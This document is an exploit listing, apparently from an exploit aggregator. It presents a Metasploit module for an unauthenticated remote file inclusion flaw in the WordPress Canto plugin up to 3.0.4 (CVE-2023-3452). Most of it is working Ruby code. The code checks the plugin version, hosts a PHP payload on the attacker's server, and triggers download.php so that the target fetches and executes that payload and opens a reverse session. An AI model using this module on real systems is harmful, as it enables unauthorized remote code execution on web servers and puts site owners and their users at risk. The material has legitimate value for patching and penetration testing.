Share
## https://sploitus.com/exploit?id=PACKETSTORM:217131
=============================================================================================================================================
    | # Title     : WordPress Canto Plugin โ‰ค 3.0.4 Unauthenticated Remote File Inclusion Leading to RCE                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://wordpress.com/plugins/canto                                                                                         |
    =============================================================================================================================================
    
    [+] Summary    : This Metasploit module targets a Remote File Inclusion (RFI) vulnerability in the WordPress Canto Plugin versions 3.0.4 and earlier.
                     The issue resides in the download.php file, where the wp_abspath parameter is not properly validated before being used in a file inclusion context. 
                     An unauthenticated attacker can supply a remote URL, causing the application to include and execute arbitrary PHP code.
    
    The module works by:
    
    Verifying the installed plugin version via readme.txt.
    
    Starting a local HTTP server to host a malicious PHP payload.
    
    Triggering the vulnerable download.php endpoint with a crafted wp_abspath parameter pointing to the attacker-controlled payload.
    
    Establishing a reverse session once the remote server includes and executes the payload.
    
    Successful exploitation results in remote code execution with the privileges of the web server process
    			  
    [+] POC   :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::Remote::HttpServer
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WordPress Canto Plugin <= 3.0.4 - Unauthenticated RFI to RCE',
          'Description'    => %q{
            This module exploits a Remote File Inclusion (RFI) vulnerability in the 
            WordPress Canto plugin (<= 3.0.4). The issue exists in download.php 
            via the 'wp_abspath' parameter.
          },
          'Author'         => [ 'indoushka' ], 
          'License'        => MSF_LICENSE,
          'References'     => [ [ 'CVE', '2023-3452' ] ],
          'Payload'        => { 'BadChars' => "\x00" },
          'Platform'       => 'php',
          'Arch'           => ARCH_PHP,
          'Targets'        => [ ['Canto <= 3.0.4', {}] ],
          'DisclosureDate' => '2023-06-12',
          'DefaultTarget'  => 0,
          'Notes'          => {
            'Stability'   => [ CRASH_SAFE ],
            'SideEffects' => [ IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ]
          }))
    
        register_options([
          OptString.new('TARGETURI', [true, 'The base path to WordPress', '/'])
        ])
      end
    
      def check
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, 'wp-content/plugins/canto/readme.txt')
        })
    
        return Exploit::CheckCode::Unknown("Target is unreachable.") unless res
    
        if res.code == 200 && res.body.include?('Canto')
          version = res.body.match(/Stable tag:\s*([\d\.]+)/)
          if version
            v_str = version[1]
            if Rex::Version.new(v_str) <= Rex::Version.new('3.0.4')
              return Exploit::CheckCode::Vulnerable("Canto version #{v_str} detected.")
            end
            return Exploit::CheckCode::Safe("Canto version #{v_str} is not vulnerable.")
          end
        end
        Exploit::CheckCode::Safe
      end
    
      def on_request_uri(cli, _request)
        print_good("Target reached out! Sending PHP payload...")
        send_response(cli, payload.encoded, { 'Content-Type' => 'application/x-httpd-php' })
      end
    
      def exploit
        start_service
        
        payload_url = get_uri
        target_path = normalize_uri(target_uri.path, 'wp-content/plugins/canto/includes/lib/download.php')
        
        print_status("Triggering RFI at #{target_path}")
        print_status("Hosting payload at #{payload_url}")
        res = send_request_cgi({
          'method'   => 'GET',
          'uri'      => target_path,
          'vars_get' => {
            'wp_abspath' => payload_url
          }
        }, 5) 
    
        if res
          print_status("Server responded with status: #{res.code}")
        else
          print_status("No response from server (this is common for RFI), checking for session...")
        end
        handler
      end
    end
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================